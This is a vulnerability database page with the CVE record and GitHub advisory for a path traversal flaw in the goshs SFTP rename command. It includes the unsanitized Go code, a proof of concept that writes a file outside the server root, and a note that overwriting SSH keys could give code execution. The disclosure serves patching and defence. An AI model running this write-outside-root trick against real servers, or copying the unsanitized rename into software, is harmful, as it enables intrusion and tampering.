Vulnerability-Lookup

CVE-2026-40188 (GCVE-0-2026-40188)

Vulnerability from cvelistv5 – Published: 2026-04-10 19:43 – Updated: 2026-04-10 19:43

Title

goshs is Missing Write Protection for Parametric Data Values

Summary

goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4.

Severity ?

7.7 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N

CWE

CWE-1314 - Missing Write Protection for Parametric Data Values

Assigner

GitHub_M

References

URL

Tags

	https://github.com/patrickhener/goshs/security/ad…	x_refsource_CONFIRM
	https://github.com/patrickhener/goshs/commit/141c…	x_refsource_MISC
	https://github.com/patrickhener/goshs/releases/ta…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	patrickhener	goshs	Affected: >= 1.0.7, < 2.0.0-beta.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "goshs",
          "vendor": "patrickhener",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.0.7, \u003c 2.0.0-beta.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1314",
              "description": "CWE-1314: Missing Write Protection for Parametric Data Values",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-10T19:43:45.197Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx"
        },
        {
          "name": "https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744"
        },
        {
          "name": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4"
        }
      ],
      "source": {
        "advisory": "GHSA-2943-crp8-38xx",
        "discovery": "UNKNOWN"
      },
      "title": "goshs is Missing Write Protection for Parametric Data Values"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40188",
    "datePublished": "2026-04-10T19:43:45.197Z",
    "dateReserved": "2026-04-09T20:59:17.620Z",
    "dateUpdated": "2026-04-10T19:43:45.197Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40188\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-10T20:16:23.733\",\"lastModified\":\"2026-04-10T20:16:23.733\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N\",\"baseScore\":7.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.1,\"impactScore\":4.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1314\"}]}],\"references\":[{\"url\":\"https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

GHSA-2943-CRP8-38XX

Vulnerability from github – Published: 2026-04-10 20:00 – Updated: 2026-04-10 21:37

Summary

goshs is Missing Write Protection for Parametric Data Values

Details

Summary

The SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP.

Details

Here is the issue:

// helper.go:155-215
func cmdFile(root string, r *sftp.Request, ip string, sftpServer *SFTPServer) error {
    fullPath, err := sanitizePath(r.Filepath, root)  // Source: SANITIZED
    if err != nil {
        return err
    }
    switch r.Method {
    // ...
    case "Rename":
        err := os.Rename(fullPath, r.Target)  // Destination: NOT SANITIZED!

PoC

To exploit just upload a file on the SFTP and rename it to a file with full path.

Currently no key.txt file inside /tmp

$ ls key.txt
ls: key.txt: No such file or directory

Start the SFTP server:

/tmp/sftp-server $ goshs -sftp -b 'user:user' -d .
WARNING[2026-04-02 20:00:18] upload-folder mode deactivated due to use of 'sftp' mode
WARNING[2026-04-02 20:00:18] There is a newer Version (v2.0.0-beta.3) of goshs available. Run --update to update goshs.
INFO   [2026-04-02 20:00:18] Starting SFTP server on port 0.0.0.0:2022
WARNING[2026-04-02 20:00:18] You are using basic auth without SSL. Your credentials will be transferred in cleartext. Consider using -s, too.
INFO   [2026-04-02 20:00:18] Using basic auth with user 'user' and password 'user'
INFO   [2026-04-02 20:00:18] Download embedded file at: /example.txt?embedded
INFO   [2026-04-02 20:00:18] Serving on interface lo0 bound to 127.0.0.1:8000
INFO   [2026-04-02 20:00:18] Serving on interface en0 bound to 192.168.68.51:8000
INFO   [2026-04-02 20:00:18] Serving HTTP from /tmp/sftp-server

Connect to the SFTP and uploading the file:

$ sftp -P 2022 user@localhost
user@localhost's password:
Connected to localhost.
sftp> put /Users/user/Downloads/key.txt
Uploading /Users/user/Downloads/key.txt to /tmp/sftp-server/key.txt
key.txt                                                                                                                                                   100%   15    40.9KB/s   00:00

The file is stored properly.

goshs log:

INFO   [2026-04-02 20:03:31] SFTP: [::1]:61742 - [Put] - "/tmp/sftp-server/key.txt"

Rename command with full path:

sftp> rename key.txt /tmp/key.txt

goshs log:

INFO   [2026-04-02 20:04:09] SFTP: [::1]:61742 - [Rename] - "/tmp/sftp-server/key.txt to /tmp/key.txt"

Key file is now in /tmp

$ ls key.txt
key.txt

Impact

This allows file write and can be used either for an RCE in form of overwrite an SSH key, or by overwriting a configuration etc.

Severity ?

7.7 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/patrickhener/goshs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.7"
            },
            {
              "last_affected": "1.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40188"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1314"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T20:00:28Z",
    "nvd_published_at": "2026-04-10T20:16:23Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. \n\n### Details\n\nHere is the issue:\n```go\n// helper.go:155-215\nfunc cmdFile(root string, r *sftp.Request, ip string, sftpServer *SFTPServer) error {\n    fullPath, err := sanitizePath(r.Filepath, root)  // Source: SANITIZED\n    if err != nil {\n        return err\n    }\n    switch r.Method {\n    // ...\n    case \"Rename\":\n        err := os.Rename(fullPath, r.Target)  // Destination: NOT SANITIZED!\n```\n\n\n### PoC\n\nTo exploit just upload a file on the SFTP and rename it to a file with full path. \n\nCurrently no key.txt file inside /tmp\n\n``` bash\n$ ls key.txt\nls: key.txt: No such file or directory\n```\n\n\nStart the SFTP server:\n``` bash\n/tmp/sftp-server $ goshs -sftp -b \u0027user:user\u0027 -d .\nWARNING[2026-04-02 20:00:18] upload-folder mode deactivated due to use of \u0027sftp\u0027 mode\nWARNING[2026-04-02 20:00:18] There is a newer Version (v2.0.0-beta.3) of goshs available. Run --update to update goshs.\nINFO   [2026-04-02 20:00:18] Starting SFTP server on port 0.0.0.0:2022\nWARNING[2026-04-02 20:00:18] You are using basic auth without SSL. Your credentials will be transferred in cleartext. Consider using -s, too.\nINFO   [2026-04-02 20:00:18] Using basic auth with user \u0027user\u0027 and password \u0027user\u0027\nINFO   [2026-04-02 20:00:18] Download embedded file at: /example.txt?embedded\nINFO   [2026-04-02 20:00:18] Serving on interface lo0 bound to 127.0.0.1:8000\nINFO   [2026-04-02 20:00:18] Serving on interface en0 bound to 192.168.68.51:8000\nINFO   [2026-04-02 20:00:18] Serving HTTP from /tmp/sftp-server\n```\n\nConnect to the SFTP and uploading the file:\n``` bash\n$ sftp -P 2022 user@localhost\nuser@localhost\u0027s password:\nConnected to localhost.\nsftp\u003e put /Users/user/Downloads/key.txt\nUploading /Users/user/Downloads/key.txt to /tmp/sftp-server/key.txt\nkey.txt                                                                                                                                                   100%   15    40.9KB/s   00:00\n```\n\nThe file is stored properly. \n\ngoshs log:\n```\nINFO   [2026-04-02 20:03:31] SFTP: [::1]:61742 - [Put] - \"/tmp/sftp-server/key.txt\"\n```\n\nRename command with full path:\n``` bash\nsftp\u003e rename key.txt /tmp/key.txt\n```\n\ngoshs log:\n```\nINFO   [2026-04-02 20:04:09] SFTP: [::1]:61742 - [Rename] - \"/tmp/sftp-server/key.txt to /tmp/key.txt\"\n```\n\nKey file is now in /tmp\n```\n$ ls key.txt\nkey.txt\n```\n\n\n### Impact\nThis allows file write and can be used either for an RCE in form of overwrite an SSH key, or by overwriting a configuration etc.",
  "id": "GHSA-2943-crp8-38xx",
  "modified": "2026-04-10T21:37:27Z",
  "published": "2026-04-10T20:00:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40188"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patrickhener/goshs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "goshs is Missing Write Protection for Parametric Data Values"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40188 (GCVE-0-2026-40188)

GHSA-2943-CRP8-38XX

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature